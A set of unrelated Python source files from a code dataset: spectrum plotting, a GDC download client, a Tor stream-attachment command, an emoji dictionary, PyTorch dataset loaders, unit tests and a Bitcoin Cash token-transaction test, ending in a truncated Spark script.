rotation=90)\n if calibration_lines!=None:\n for i in calibration_lines:\n plt.axvline(x=i, linestyle='-',color='r',linewidth=0.8)\n plt.xlabel('Energy [MeV]')\n plt.ylabel('Counts')\n plt.yscale(yscale)\n plt.title(title)\n plt.legend()\n plt.savefig(os.path.join(self.save_folder,\n 'calibrated{}_{}.jpg'.format(title,yscale)),\n dpi=500)\n plt.show()\n \n def subtracted_spectrum_plotter(self,title):\n '''Plot the background subtracted spectrum\n Takes as arguement:\n title- descriptive title of the graph\n '''\n plt.figure(self.figure_number)\n self.figure_number+=1\n plt.plot(self.back_bins,self.subtracted_counts,\n label='No target subtracted spectrum')\n plt.xlabel('Bins')\n plt.ylabel('Counts')\n plt.title(title)\n plt.show() \n \n def HPGE_calibration(self, energy_per_bin=0.003, background_calibration=None):\n '''Used to calibrate the HPGE detector using a linear fit\n energy_per_bin: float\n background_calibration: boolean, true to calibrate background \n spectrum'''\n if background_calibration==None:\n calibrated=[i*energy_per_bin for i in self.fore_bins]\n elif background_calibration!=None:\n calibrated=[i*energy_per_bin for i in self.back_bins]\n return calibrated\n \n def KNIFE_calibration(self, bins, energies, background_calibration=None,\n scalar=1,m=None,b=None):\n '''used to calibrate the KNIFE detector\n Takes as arguements:\n bins: a list of bins associated with each energy found in energies\n energies: a list of energies based on the bins\n background_calibration: boolean, true to calibrate background \n spectrum\n '''\n bins=np.asarray(bins)\n energies=np.asarray(energies)\n# x_2=[i**2 for i in bins]\n# xy=[bins[i]*energies[i] for i in range(len(bins))]\n if m==None:\n n=np.size(bins)\n m_x,m_y=np.mean(bins),np.mean(energies)\n xy=np.sum(bins*energies)-n*m_y*m_x\n xx=np.sum(bins*bins)-n*m_x*m_x\n m=xy/xx\n b=m_y-m*m_x\n\n if background_calibration==None:\n calibrated=[scalar*(m*i+b) for i in self.fore_bins]\n elif background_calibration!=None:\n calibrated=[scalar*(m*i+b) for i in self.back_bins]\n return calibrated\n \n def counts_scaling(self,scale_factor):\n '''Used to scale the number of counts from foreground to \n background\n '''\n self.back_counts=[i*scale_factor for i in self.back_counts]\n \n def calibration_saving(self,calib,name):\n save_location=os.path.join(os.getcwd(),'Calibrations')\n file_name=os.path.join(save_location,name+'.txt')\n f=open(file_name,'w')\n for i in calib:\n f.write('{}\\n'.format(i))\n f.close()\n \n \n#if __name__ ==\"__main__\": \n# b_loc8=os.path.join(loc8,'histogram_15-37-05.txt')\n# f_loc8=os.path.join(loc8,'histogram_16-44-29.txt')\n# #have to read in each text file, then create a new file to write just the \n# #counts to\n# b=open(b_loc8,'r')\n# b_data=b.readlines()\n# b.close()\n# bo=open(os.path.join(loc8,'KNIFE_back.txt'),'w')\n# for i in range(len(b_data)):\n# bo.write('{}\\n'.format(float(b_data[i].split(sep=',')[1])))\n# bo.close()\n# f=open(f_loc8,'r')\n# f_data=f.readlines()\n# f.close()\n# fo=open(os.path.join(loc8,'KNIFE_fore.txt'),'w')\n# for i in range(len(f_data)):\n# fo.write('{}\\n'.format(float(f_data[i].split(sep=',')[1])))\n# fo.close() #get \n# \n# #spectral analysis for the KNIFE detector\n# b_loc8=os.path.join(loc8,'KNIFE_back.txt')\n# f_loc8=os.path.join(loc8,'KNIFE_fore.txt')\n# knife_90505=Spectra_Analysis(f_loc8,b_loc8,0,0)\n# fore_90505,back_90509=knife_90505.average_count_rate(25*60,15*60)\n# knife_90505.counts_scaling(1)\n# cali=knife_90505.KNIFE_calibration([642,220],[2.22325,7.64],m=0.00348,b=-0.011291)\n## back_cali=knife_90505.KNIFE_calibration([450],[1.436],\n## background_calibration=True)\n## knife_90505.calibrated_spectrum_plotter('905-05 in beam','KNIFE with 905-05 in beam',\n## cali,second_label='No target',\n## yscale='log',\n## energies=[10.829,6.322,5.269,1.885,\n## 5.53,4.51,3.68,\n## 4.95,1.26,3.68],\n## xtick_remove=[2])\n## back_calibration=back_cali)\n# \n# #put the knife and 2x4 on top of each other\n# fore_loc8=os.path.join(loc8,'2x4LaBr_Digitizer_90505.txt') \n## f_loc8=os.path.join(loc8,'histogram_16-44-29.txt')\n# labr_knife=Spectra_Analysis(fore_loc8,f_loc8,0,0)\n# la_fore,la_back=labr_knife.average_count_rate(15*60,15*60)\n# labr_knife.calibrated_spectrum_plotter('2x4 w/KSU digitizer','905-05 in beam KNIFE and 2x4LaBr',\n# labr_with,second_label='KNIFE',\n# yscale='log',\n# back_calibration=cali,\n# zoomed=[0,14],\n# energies=[10.829,6.322,5.269,1.885,\n# 5.53,4.51,3.68,\n# 4.95,1.26,3.68,10.318,9.807],\n# xtick_remove=[2],\n# calibration_lines=[2.2232,7.645])\n#","sub_path":"Spectral_Analyzer2.py","file_name":"Spectral_Analyzer2.py","file_ext":"py","file_size_in_byte":14105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"271363387","text":"from StringIO import StringIO\nimport os\nimport requests\nimport tarfile\nimport time\nimport urlparse\n\nfrom parcel import HTTPClient, UDTClient, utils\nfrom parcel.download_stream import DownloadStream\nfrom ..query.index import GDCIndexClient\n\nimport logging\n\nlog = logging.getLogger('gdc-download')\n\nclass GDCDownloadMixin(object):\n\n def download_small_groups(self, smalls):\n # List[List[str]] -> List[List[str]]\n \"\"\"Smalls are predetermined groupings of smaller filesize files.\n They are grouped to reduce the number of open connections per download\n\n \"\"\"\n\n tarfile_url = self.data_uri + '?tarfile'\n errors = []\n groupings_len = len(smalls)\n for i, s in enumerate(smalls):\n if len(s) == 0:\n log.error('There are no files to download')\n return\n\n try:\n # post request\n # {'ids': ['id1', 'id2'..., 'idn']}\n ids = {\"ids\": s}\n\n # using a POST request lets us avoid the MAX URL character length limit\n r = requests.post(tarfile_url, stream=True, verify=self.verify, json=ids)\n if r.status_code == requests.codes.ok:\n\n # {'content-disposition': 'filename=the_actual_filename.tar'}j\n filename = r.headers.get('content-disposition') or \\\n r.headers.get('Content-Disposition')\n\n if filename:\n filename = os.path.join(self.directory, filename.split('=')[1])\n else:\n filename = time.strftime(\"gdc-client-%Y%m%d-%H%M%S\")\n log.info('Saving grouping {0}/{1}'.format(i+1, groupings_len))\n with open(filename, 'wb') as f:\n for chunk in r:\n f.write(chunk)\n else:\n log.warning('[{0}] unable to download group {1} '.format(r.status_code, i+1))\n errors.append(ids['ids'])\n time.sleep(0.5)\n\n r.close()\n\n except Exception as e:\n log.warning('Grouping download failed: {0}'.format(i+1))\n errors.append(ids['ids'])\n log.warn(e)\n\n return errors\n\n\n def parallel_download(self, stream, download_related_files=None,\n download_annotations=None, *args, **kwargs):\n\n # This is a little confusing because gdc-client\n # calls parcel's parallel_download, which is where\n # most of the downloading takes place\n stream.directory = self.directory\n super(GDCDownloadMixin, self).parallel_download(stream)\n\n\nclass GDCHTTPDownloadClient(GDCDownloadMixin, HTTPClient):\n\n def __init__(self, uri, download_related_files=True,\n download_annotations=True, *args, **kwargs):\n # accepts args, but never called with args\n self.base_uri = self.fix_url(uri)\n if not self.base_uri.endswith('/'):\n self.base_uri += '/'\n self.data_uri = urlparse.urljoin(self.base_uri, 'data/')\n self.related_files = download_related_files\n self.annotations = download_annotations\n\n self.directory = os.path.abspath(time.strftime(\"gdc-client-%Y%m%d-%H%M%S\"))\n if kwargs.get('directory'):\n self.directory = kwargs.get('directory')\n\n self.verify = kwargs.get('verify')\n super(GDCDownloadMixin, self).__init__(*args, **kwargs)\n\n\nclass GDCUDTDownloadClient(GDCDownloadMixin, UDTClient):\n\n def __init__(self, remote_uri, download_related_files=True,\n download_annotations=True, *args, **kwargs):\n\n remote_uri = self.fix_url(remote_uri)\n self.base_uri = remote_uri\n self.data_uri = urlparse.urljoin(remote_uri, 'data/')\n self.related_files = download_related_files\n self.annotations = download_annotations\n self.directory = os.path.abspath(time.strftime(\"gdc-client-%Y%m%d-%H%M%S\"))\n super(GDCDownloadMixin, self).__init__(*args, **kwargs)\n","sub_path":"gdc_client/download/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"221858231","text":"from __future__ import print_function\n\nimport os\nimport sys\nimport functools\n\nfrom twisted.python import usage, log\nfrom twisted.internet import defer, reactor\nimport zope.interface\nimport txtorcon\n\nfrom carml.interface import ICarmlCommand\nfrom carml import util\n\n\nclass StreamOptions(usage.Options):\n def __init__(self):\n super(StreamOptions, self).__init__()\n self.longOpt.remove('version')\n self.longOpt.remove('help')\n self['delete'] = []\n\n optFlags = [\n ('list', 'L', 'List existing streams.'),\n # ('per-process', 'p', 'Attach all new streams to one circuit, per PID.'),\n ]\n\n optParameters = [\n ('attach', 'a', 0, 'Attach all new streams to a particular circuit-id.', int),\n ('close', 'd', 0, 'Delete/close a stream by its ID.', int),\n ]\n\n\ndef attach_streams_per_process(state):\n print(\"Exiting (e.g. Ctrl-C) will cause Tor to resume choosing circuits.\")\n print(\"Giving each new PID we see its own Circuit (until they're gone).\")\n\n class Attacher(object):\n zope.interface.implements(txtorcon.IStreamAttacher)\n\n def __init__(self):\n self.pid_to_circuits = {}\n\n def choose_new_circuit(self, stream, circuits):\n for circ in circuits.values():\n if circ in self.pid_to_circuits.values():\n continue\n if circ.state != 'BUILT':\n continue\n return circ\n raise RuntimeError(\"Ran out of circuits to select.\")\n\n def attach_stream(self, stream, circuits):\n src_addr, src_port = stream.flags['SOURCE_ADDR'].split(':')\n pid = txtorcon.util.process_from_address(src_addr, src_port)\n procname = os.path.realpath('/proc/%d/exe' % pid)\n\n try:\n circ = self.pid_to_circuits[pid]\n except KeyError:\n circ = self.choose_new_circuit(stream, circuits)\n self.pid_to_circuits[pid] = circ\n print('Selected circuit %d for process %d (%s).' % (circ.id, pid, procname))\n print(' ', '->'.join([p.name if p.name_is_unique else ('{%s}' % p.name) for p in circ.path]))\n\n# if stream.state == 'NEWRESOLVE':\n# print \" attaching %d (resolve %s)\" % (stream.id, stream.target_host)\n# else:\n print(\" attaching stream %d to circuit %d for %s:%d (%s)\" % (stream.id, circ.id, stream.target_host, stream.target_port, procname))\n return circ\n\n state.set_attacher(Attacher(), reactor)\n\n\ndef attach_streams_to_circuit(circid, state):\n circ = state.circuits[circid]\n print(\"Exiting (e.g. Ctrl-C) will cause Tor to resume choosing circuits.\")\n print(\"Attaching all new streams to Circuit %d.\" % circ.id)\n print(\" \", '->'.join([p.name if p.name_is_unique else ('~%s' % p.name) for p in circ.path]))\n\n class Attacher(object):\n zope.interface.implements(txtorcon.IStreamAttacher)\n\n def attach_stream(self, stream, circuits):\n if stream.state == 'NEWRESOLVE':\n print(\" attaching %d (resolve %s)\" % (stream.id, stream.target_host))\n else:\n print(\" attaching %d %s:%d\" % (stream.id, stream.target_host,\n stream.target_port))\n return circ\n\n state.set_attacher(Attacher(), reactor)\n # FIXME doesn't exit on control-c? :(\n d = defer.Deferred()\n d.addBoth(lambda x: print('foo', x))\n return d\n\n\ndef list_streams(state, verbose):\n print(\"Streams:\")\n for stream in state.streams.values():\n flags = str(stream.flags) if stream.flags else 'no flags'\n state = stream.state\n state_to_color = dict(SUCCEEDED=util.colors.green,\n FAILED=util.colors.red)\n if state in state_to_color:\n state = state_to_color[state](state)\n print(\" %d: %s on circuit %d (%s)\" % (stream.id, state, stream.circuit.id,\n flags))\n if verbose:\n h = stream.target_addr if stream.target_addr else stream.target_host\n source = txtorcon.util.process_from_address(stream.source_addr, stream.source_port)\n if source is None:\n source = 'unknown'\n print(\" to %s:%s, from %s\" % (h, stream.target_port, source))\n\n reactor.stop()\n\n\n@defer.inlineCallbacks\ndef close_stream(state, streamid):\n class DetermineStreamClosure(object):\n def __init__(self, target_id, done_d):\n self.circ_id = str(target_id)\n self.stream_gone = False\n self.already_deleted = False\n self.completed_d = done_d\n\n def __call__(self, text):\n cid, what, _ = text.split(' ', 2)\n if what in ['CLOSED', 'FAILED']:\n if self.circ_id == cid:\n self.stream_gone = True\n print(\"gone (%s)...\" % self.circ_id,)\n sys.stdout.flush()\n if self.already_deleted:\n self.completed_d.callback(self)\n if streamid not in state.streams:\n print('No such stream \"%s\".' % streamid)\n return\n print('Closing stream \"%s\"...' % (streamid, ))\n\n gone_d = defer.Deferred()\n monitor = DetermineStreamClosure(streamid, gone_d)\n state.protocol.add_event_listener('STREAM', monitor)\n sys.stdout.flush()\n\n try:\n status = yield state.streams[streamid].close()\n status = status.state\n monitor.already_deleted = True\n except txtorcon.TorProtocolError as e:\n print(util.colors.red('Error: ') + e.what())\n return\n\n if monitor.stream_gone:\n print(status)\n return\n\n print('%s (waiting for CLOSED)...' % status)\n sys.stdout.flush()\n yield gone_d\n # we're now awaiting a callback via CIRC events indicating\n # that our stream has entered state CLOSED\n\n\nclass StreamCommand(object):\n zope.interface.implements(ICarmlCommand)\n\n # Attributes specified by ICarmlCommand\n name = 'stream'\n options_class = StreamOptions\n help_text = 'Manipulate Tor streams.'\n controller_connection = True\n build_state = True\n\n def validate(self, options, mainoptions):\n cmds = ['attach', 'list', 'close'] # , 'per-process']\n not_a_one = all(map(lambda x: not options[x], cmds))\n if not_a_one:\n raise RuntimeError(\"Specify one of: \" + ', '.join(cmds))\n\n def run(self, options, mainoptions, state):\n \"\"\"\n ICarmlCommand API\n \"\"\"\n\n verbose = True\n if 'verbose' in options:\n verbose = options['verbose']\n if options['attach']:\n return attach_streams_to_circuit(options['attach'], state)\n# elif options['per-process']:\n# return attach_streams_per_process(state)\n elif options['list']:\n return list_streams(state, verbose)\n elif options['close']:\n d = close_stream(state, options['close'])\n d.addBoth(lambda x: reactor.stop())\n return d\n\n reactor.stop()\n\ncmd = StreamCommand()\n__all__ = ['cmd']\n","sub_path":"carml/command/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":7173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"611382458","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win-amd64\\egg\\emoji_cli\\emoji_dict.py\n# Compiled at: 2019-04-12 01:39:25\n# Size of source mod 2**32: 2365 bytes\n\"\"\"\nDesc: Emoji python dict module.\nAuthor: binbin.hou\nDate: 2019-4-11 20:24:25\nSince: 0.0.1\n\"\"\"\nimport os\nfrom io import open\nfrom emoji_cli import emoji_const as const\nfrom emoji_cli.emoji_util import *\n\nclass Dict(object):\n __doc__ = '\\n 获取字典信息\\n '\n _Dict__emoji_info_dict = {}\n _Dict__current_path = os.path.dirname(os.path.abspath(__file__))\n\n def __init__(self):\n \"\"\"\n 内部初始化\n \"\"\"\n self._Dict__init_dict(const.EMOJI_DATA_PATH, self._Dict__emoji_info_dict)\n\n def __init_dict(self, relative_path, emoji_dict):\n \"\"\"\n 初始化所有的字典信息\n 1. 跳过空白行\n 2. 跳过#开头的行(实际为分组)\n :param relative_path: 相对文件路径\n :param emoji_dict: 原始集合\n :return: 无\n \"\"\"\n with open((self._Dict__current_path + relative_path), mode='r', encoding=(const.DEFAULT_CHARSET)) as (stc):\n for line in stc:\n if line.startswith('#'):\n continue\n if StrUtil.is_empty(line.strip()):\n continue\n lines = line.split(StrUtil.COMMA)\n emoji_dict[lines[0]] = lines[1].strip()\n\n def name(self, emoji):\n \"\"\"\n 获取 emoji 对应的英文名称\n :param emoji: emoji 字符\n :return: 英文名称\n \"\"\"\n return self._Dict__get_val(emoji, self._Dict__emoji_info_dict)\n\n def emoji(self, english_name):\n \"\"\"\n 获取 emoji 对应的英文名称\n :param english_name: 英文名称\n :return: 表情列表\n \"\"\"\n result_list = []\n for key, value in self._Dict__emoji_info_dict.items():\n if value.find(english_name) >= 0:\n result_list.append(key)\n\n return result_list\n\n @staticmethod\n def __get_val(key, _Dict__dict):\n \"\"\"\n 获取对应的值\n 1. 如果 key 为空,直接返回\n 2. 如果没获取到值,默认返回 key\n :param key: 入参\n :param __dict: 对应的字典信息\n :return: 结果\n \"\"\"\n result = _Dict__dict.get(key, StrUtil.EMPTY)\n return result\n\n\ndict_singleton = Dict()","sub_path":"pycfiles/emoji_cli-0.0.1-py3.7/emoji_dict.cpython-37.py","file_name":"emoji_dict.cpython-37.py","file_ext":"py","file_size_in_byte":2526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"453029592","text":"import os\nimport torch\nimport random\nimport pickle\n\nimport numpy as np\nimport torchvision.transforms as transforms\n\nfrom PIL import Image\nfrom torch.utils.data.dataset import Dataset\n\nfrom libs.utils import *\nfrom libs.neurvps_func import *\n\n\nclass Train_Dataset_MNet(Dataset):\n\n def __init__(self, cfg):\n # cfg\n self.cfg = cfg\n\n self.width = cfg.width\n self.height = cfg.height\n\n # load datalist\n with open(cfg.pickle_dir + 'MNet/train_candidates.pickle', 'rb') as f:\n self.datalist = pickle.load(f)\n\n self.transform = transforms.Compose([transforms.Resize((cfg.height, cfg.width), 2),\n transforms.ToTensor()])\n self.normalize = transforms.Normalize(mean=cfg.mean, std=cfg.std)\n\n def get_image(self, flip, idx):\n img_name = self.cfg.dataset_dir + self.datalist[idx]['img_path']\n img = Image.open(img_name).convert('RGB')\n if flip == 1:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n width, height = img.size\n return img, torch.FloatTensor([height, width]), self.datalist[idx]['img_path']\n\n\n def get_line(self, flip, idx):\n\n # load pickle\n data = self.datalist[idx]\n\n if flip == 1:\n # positive set\n for i in range(len(data['pos'])):\n data['pos'][i][:, 0] = self.width - 1 - data['pos'][i][:, 0]\n data['pos'][i][:, 2] = self.width - 1 - data['pos'][i][:, 2]\n\n # negative set\n for i in range(len(data['neg'])):\n data['neg'][i][:, 0] = self.width - 1 - data['neg'][i][:, 0]\n data['neg'][i][:, 2] = self.width - 1 - data['neg'][i][:, 2]\n\n return data\n\n def __getitem__(self, idx):\n\n # flip\n flip = random.randint(0, 1)\n\n # get pre-processed images\n img, img_size, img_name = self.get_image(flip, idx)\n img = self.transform(img)\n\n # load candidate label\n training_data = self.get_line(flip, idx)\n\n return {'img_rgb': img,\n 'img': self.normalize(img),\n 'img_size': img_size,\n 'img_name': img_name,\n 'flip': flip,\n 'training_data': training_data}\n\n def __len__(self):\n return len(self.datalist)\n\n\n\nclass AVA_Test_Dataset(Dataset):\n\n def __init__(self, cfg):\n # cfg\n self.cfg = cfg\n\n # image size\n self.height = cfg.height\n self.width = cfg.width\n\n # load datalist\n with open(self.cfg.dataset_dir + 'neurvps_test.pickle', 'rb') as f:\n self.datalist = pickle.load(f)\n\n # image transform\n self.transform = transforms.Compose([transforms.Resize((self.height, self.width), 2),\n transforms.ToTensor()])\n self.normalize = transforms.Normalize(mean=cfg.mean, std=cfg.std)\n\n def get_image(self, flip, idx):\n\n img_path = self.cfg.dataset_dir + self.datalist['img_path'][idx]\n\n img = Image.open(img_path).convert('RGB')\n if flip == 1:\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n width, height = img.size\n\n return img, torch.FloatTensor([height, width]), self.datalist['img_path'][idx]\n\n def get_vp(self, img_size, idx):\n\n label = (self.cfg.dataset_dir + self.datalist['img_path'][idx]).replace('.jpg', '.txt')\n axy, bxy = np.genfromtxt(label, skip_header=1)\n\n a0, a1 = np.array(axy[:2]), np.array(axy[2:])\n b0, b1 = np.array(bxy[:2]), np.array(bxy[2:])\n xy = intersect(a0, a1, b0, b1) - 0.5\n\n xy[0] *= self.width / img_size[1]\n xy[1] *= self.height / img_size[0]\n\n vpts = np.array([[xy[0] / (self.width / 2) - 1, 1 - xy[1] / (self.height / 2), 1]])\n vpts[0] /= LA.norm(vpts[0])\n vpts = np.float32(vpts)\n return self.datalist['gtline'][idx], vpts, xy\n\n\n def __getitem__(self, idx):\n\n # flip\n flip = 0\n\n # get pre-processed images\n img, img_size, img_name = self.get_image(flip, idx)\n img = self.transform(img)\n\n gt, vp, vp_xy = self.get_vp(img_size, idx)\n\n return {'img_rgb': img,\n 'img': self.normalize(img),\n 'img_size': img_size,\n 'img_name': img_name,\n 'flip': flip,\n 'gt': gt,\n 'vp': vp,\n 'vp_xy': vp_xy}\n\n def __len__(self):\n return len(self.datalist['img_path'])\n","sub_path":"Dominant_parallel_lines_detection/MNet/code/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":4516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"371031089","text":"# -*- encoding: utf-8 -*-\n#\n# (c) Copyright 2016 Hewlett Packard Enterprise Development LP\n# Copyright 2016 Universidade Federal de Campina Grande\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"\nUnit test cases for the node.py module.\n\"\"\"\n\nfrom ovm_ironic.model.metric import Metric\nfrom ovm_ironic.model.node import Node\nfrom base import TestBase\n\nimport ovm_ironic.shared.constants as const\n\n\nclass TestNode(TestBase):\n \"\"\"This class test the node module from the ovm_ironic.model.\n \"\"\"\n def setUp(self):\n \"\"\"Setting up the tests.\n \"\"\"\n super(TestNode, self).setUp()\n\n def tearDown(self):\n \"\"\"Tearing down the tests.\n \"\"\"\n super(TestNode, self).tearDown()\n\n def test_node_is_not_none(self):\n \"\"\"Test case regarding it a node is None.\n Test flow:\n >>> Checks if a new node is not equal to None.\n \"\"\"\n # testing if it is not none Instace\n self.assertNotEqual(Node(''), None)\n\n def test_node_name(self):\n \"\"\"Test case regarding the name of a node.\n Test flow:\n >>> Creates a new node with \"new-node\" as parameter; and,\n >>> Checks if the new node has \"new-node\" as its name.\n \"\"\"\n # testing if its name is equal to its supposed value\n node = Node('new-node')\n self.assertEquals(node.server_hardware_uuid, 'new-node')\n\n def test_node_metrics(self):\n \"\"\"Test cases regarding node metrics.\n Test flow:\n >>> Creates a dimension dim1 based on a template constant;\n >>> Creates an attribute 'server_hardware_uuid' with the value '123' to\n this dim1;\n >>> Creates an attribute 'service' based on a service name\n constant to this dim1;\n >>> Creates a dimension dim2 based on a template constant;\n >>> Creates an attribute 'server_hardware_uuid' with the value '321' to\n dim2;\n >>> Creates an attribute 'service' based on a service name\n constant to dim2;\n >>> Creates a metric metric1 with \"new-metric1\" and dim1 as parameters;\n >>> Creates a metric metric2 with \"new-metric2\" and dim2 as parameters;\n >>> Creates a set of metrics and adds metric1 and metric2 to it;\n >>> Creates a node with 'uuid-server-hardware' and the metrics set as\n parameters;\n >>> Checks if the size of the collection of metrics of the node is equal to 2;\n and;\n >>> Checks if the nome name is equal to 'uuid-server-hardware';\n \"\"\"\n # testing if it dimensions is supposed names\n dim1 = const.TEMPLATE_DIMENSIONS\n dim1['server_hardware_uuid'] = '123'\n dim1['service'] = const.SERVICE_NAME\n\n dim2 = const.TEMPLATE_DIMENSIONS\n dim2['server_hardware_uuid'] = '321'\n dim2['service'] = const.SERVICE_NAME\n\n metric1 = Metric('new-metric1', dim1)\n metric2 = Metric('new-metric2', dim2)\n metrics = set()\n metrics.add(metric1)\n metrics.add(metric2)\n\n node = Node('uuid-server-hardware', metrics)\n\n self.assertEquals(len(node.metrics), 2)\n self.assertEquals(node.server_hardware_uuid, 'uuid-server-hardware')\n\n def test_node_methods(self):\n \"\"\"Test cases regarding the methods of the node object.\n Test flow:\n >>> Creates an empty metrics set;\n >>> Creates a node with 'uuid-server-hardware' and the metrics set as\n parameters;\n >>> Checks if a node is equal to itself;\n >>> Checks if a node is not None;\n >>> Checks if a node is not equal to another one;\n >>> Checks if the __hash__ method has the same return when called twice; and,\n >>> Checks if the __repr__ method has the same return when called twice.\n \"\"\"\n\n metrics = set()\n\n node = Node('uuid-server-hardware', metrics)\n\n self.assertTrue(node.__eq__(node))\n self.assertFalse(node.__eq__(None))\n self.assertFalse(node is Node('other_node', metrics))\n self.assertEquals(node.__hash__(), node.__hash__())\n self.assertEquals(node.__repr__(), node.__repr__())\n","sub_path":"ovm-ironic/tests/test_node.py","file_name":"test_node.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"353920087","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\ndef ReadData():\n Xfile = Path(\"./TemperatureControlXData.dat\")\n Yfile = Path(\"./TemperatureControlYData.dat\")\n \n if Xfile.exists() & Yfile.exists():\n X = np.load(Xfile)\n Y = np.load(Yfile)\n\n return X.reshape(1, -1), Y.reshape(1, -1)\n else:\n return None, None\n\ndef ForwardCalculation(w, x, b):\n z = np.dot(w, x) + b\n return z\n\ndef BackPropagation(x, y, z):\n dZ = z - y\n dB = dZ\n dW = np.dot(dZ, x)\n return dW, dB\n\ndef UpdateWeights(w, b, dW, dB, eta):\n w = w - eta*dW\n b = b - eta*dB\n return w,b\n\ndef Inference(w,b,x):\n z = ForwardCalculation(w,b,x)\n return z\n\ndef GetSample(X,Y,i):\n x = X[0,i]\n y = Y[0,i]\n return x,y\n\ndef ShowResult(X, Y, w, b, iteration):\n # draw sample data\n plt.plot(X, Y, \"b.\")\n # draw predication data\n PX = np.linspace(0,1,10)\n PZ = w*PX + b\n plt.plot(PX, PZ, \"r\")\n plt.title(\"Air Conditioner Power\")\n plt.xlabel(\"Number of Servers(K)\")\n plt.ylabel(\"Power of Air Conditioner(KW)\")\n plt.show()\n print(iteration)\n print(w,b)\n\nif __name__ == '__main__':\n # learning rate\n eta = 0.1\n # set w,b=0, you can set to others values to have a try\n #w, b = np.random.random(),np.random.random()\n w, b = 0, 0\n # create mock up data\n X, Y = ReadData()\n # count of samples\n num_example = X.shape[1]\n print(\"num_example=\", num_example)\n for i in range(num_example):\n # get x and y value for one sample\n x,y = GetSample(X,Y,i)\n # get z from x,y\n z = ForwardCalculation(w, b, x)\n # calculate gradient of w and b\n dW, dB = BackPropagation(x, y, z)\n # update w,b\n w, b = UpdateWeights(w, b, dW, dB, eta)\n\n ShowResult(X, Y, w, b, 1)\n\n result = Inference(w,b,0.346)\n print(\"result=\", result)\n","sub_path":"040/043.py","file_name":"043.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"641456647","text":"#!/usr/bin/env python3\n# Copyleft (c) 2017 eric sun\n\nfrom test_framework.test_framework import BitcoinTestFramework\nfrom test_framework.util import (assert_equal, assert_raises_rpc_error)\nfrom test_framework.authproxy import JSONRPCException\nimport time\n\nclass WHC_TOKEN_MANAGE(BitcoinTestFramework):\n def set_test_params(self):\n self.num_nodes = 2\n self.tip = None\n self.setup_clean_chain = True\n\n def token_manage_test(self):\n # generate 200whc for node[0]\n address = self.nodes[0].getnewaddress(\"\")\n address_dst = self.nodes[1].getnewaddress(\"\")\n self.nodes[0].generatetoaddress(1, address)\n self.nodes[0].generatetoaddress(1, address_dst)\n time.sleep(5)\n self.nodes[0].generatetoaddress(100, address)\n time.sleep(5)\n trans_id = self.nodes[0].whc_burnbchgetwhc(4)\n trans_id1 = self.nodes[1].whc_burnbchgetwhc(4)\n self.nodes[0].generatetoaddress(1, address)\n time.sleep(1)\n\n # exp1: Ecosystem is invalid\n ret = self.nodes[0].whc_createrawtx_input(\"\", trans_id, 2)\n payload = self.nodes[0].whc_createpayload_issuancemanaged(1, 1, 0, \"\", \"\", \"l\", \"\", \"\")\n p = payload[:9] + '3' + payload[10:]\n ret = self.nodes[0].whc_createrawtx_opreturn(ret, p)\n ret = self.nodes[0].whc_createrawtx_reference(ret, address, 45.99)\n ret = self.nodes[0].signrawtransactionwithwallet(ret)\n trans_id = self.nodes[0].sendrawtransaction(ret[\"hex\"])\n self.nodes[0].generatetoaddress(10, address)\n time.sleep(1)\n trans = self.nodes[0].whc_gettransaction(trans_id)\n assert trans[\"valid\"] is False\n assert trans[\"invalidreason\"] == \"Ecosystem is invalid\"\n\n # exp2: property name is invalid\n ret = self.nodes[0].whc_createrawtx_input(\"\", trans_id, 1)\n payload = self.nodes[0].whc_createpayload_issuancemanaged(1, 1, 0, \"\", \"\", \"l\", \"\", \"\")\n p = payload[:26] + \"00\" + payload[28:]\n ret = self.nodes[0].whc_createrawtx_opreturn(ret, p)\n ret = self.nodes[0].whc_createrawtx_reference(ret, address, 45.98)\n ret = self.nodes[0].signrawtransactionwithwallet(ret)\n trans_id = self.nodes[0].sendrawtransaction(ret[\"hex\"])\n self.nodes[0].generatetoaddress(10, address)\n time.sleep(1)\n trans = self.nodes[0].whc_gettransaction(trans_id)\n assert trans[\"valid\"] is False\n assert trans[\"invalidreason\"] == \"Property name is empty\"\n\n def run_test(self):\n self.token_manage_test()\n\n\nif __name__ == '__main__':\n WHC_TOKEN_MANAGE().main()\n","sub_path":"test/functional/whc_issuemanagednegtive.py","file_name":"whc_issuemanagednegtive.py","file_ext":"py","file_size_in_byte":2601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"169979159","text":"#!/usr/bin/env python3\n#\n# rdd_parition.py\n#\n# Experiment with paritions.\n\nfrom pyspark import SparkConf, SparkContext\n\nconf = SparkConf().setAppName(\"Count Appx\")\nsc = SparkContext(conf=conf)\nsc.setLogLevel(\"ERROR\")\n\nnums = range(0, 10)\nprint(nums)\n\n# The default is defined via sc.defaultParallelism. In a case of using parallelize()\n# without partitioner data is evenly distributed between partitions using their\n# indices (no partitioning scheme is 